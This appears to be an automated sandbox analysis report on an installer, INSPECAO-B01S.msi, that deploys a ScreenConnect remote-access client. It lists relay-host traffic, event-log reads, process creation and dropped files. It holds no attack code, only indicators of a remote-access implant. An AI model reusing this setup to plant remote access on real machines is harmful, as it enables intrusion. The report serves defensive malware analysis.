Windows Analysis Report
INSPECAO-B01S.msi

Reads the Security eventlog

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: instance-xkznvd-relay.screenconnect.com

Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000008.00000002.2942134728.0000017F9328D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000008.00000003.1757539471.0000017F93048000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000008.00000003.1757539471.0000017F9307D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.8.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/8
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/V
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002397000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002466000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000022C6000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.00000000020CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.000000000237D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002178000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002234000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/d
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/l
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2939627103.00000000013A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://instance-xkznvd-relay.screenconnect.com:443/r
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2940900187.0000000002002000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000003.00000003.1697090286.0000000004801000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1697090286.0000000004872000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ScreenConnect.ClientService.exe, 00000006.00000002.2944315809.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2942897895.0000000012390000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2947333644.000000001CE62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ScreenConnect.WindowsCredentialProvider.dll.1.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 00000008.00000003.1757539471.0000017F930F2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect	Jump to behavior

Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe

Code function: 6_2_05F32280 CreateProcessAsUserW,

6_2_05F32280

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1432.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI15E7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI1608.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI17AE.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\4c1434.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{87BA6F17-ED48-2213-B0B4-DE77D334918D}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{87BA6F17-ED48-2213-B0B4-DE77D334918D}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\cksz2bob.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\blegu5ad.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\0hs00sh4.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\hfe01imn.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\jfhfu5lw.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (3a24aebb8959bcfa)\3mrf34qd.newcfg	Jump to behavior
